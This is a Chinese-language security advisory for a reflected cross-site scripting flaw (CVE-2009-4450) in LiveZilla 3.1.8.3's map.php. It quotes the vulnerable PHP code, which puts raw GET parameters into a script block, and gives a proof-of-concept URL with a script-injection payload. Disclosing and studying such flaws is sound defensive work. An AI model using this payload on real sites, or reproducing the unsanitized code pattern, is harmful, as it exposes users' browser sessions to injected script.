LiveZilla map.php页面多个跨站脚本漏洞
发布日期:2009-12-29
更新日期:2009-12-30
受影响系统:LiveZilla GmbH LiveZilla 3.1.8.3
描述:
CVE(CAN) ID:
CVE-2009-4450
LiveZilla是新一代的在线客服与客户地理位置跟踪系统。
LiveZilla没有正确地过滤提交给map.php页面的lat、lng和zom参数便返回给了用户,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器会话中执行任意HTML和脚本代码。以下是有漏洞的代码段:
1. livezilla/templates/map.tpl(18-20行)
var default_lat = <!--dlat-->;
var default_lng = <!--dlng-->;
var default_zom = <!--dzom-->;
2. livezilla/map.php(15-28行)
if(isset($_GET["lat"]))
$map = str_replace("<!--dlat-->",$_GET["lat"],$map);
else
$map = str_replace("<!--dlat-->","25",$map);
if(isset($_GET["lng"]))
$map = str_replace("<!--dlng-->",$_GET["lng"],$map);
else
$map = str_replace("<!--dlng-->","10",$map);
if(isset($_GET["zom"]))
$map = str_replace("<!--dzom-->",$_GET["zom"],$map);
else
$map = str_replace("<!--dzom-->","1",$map);
<*来源:MaXe
链接:
http://secunia.com/advisories/37990/
http://forum.intern0t.net/intern0t-advisories/1998-intern0t-livezilla-cross-site-scripting-vulnerability.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://localhost/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E建议:
厂商补丁:
LiveZilla GmbH
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.livezilla.net/home/en/浏览次数:3752
严重程度:0(网友投票)
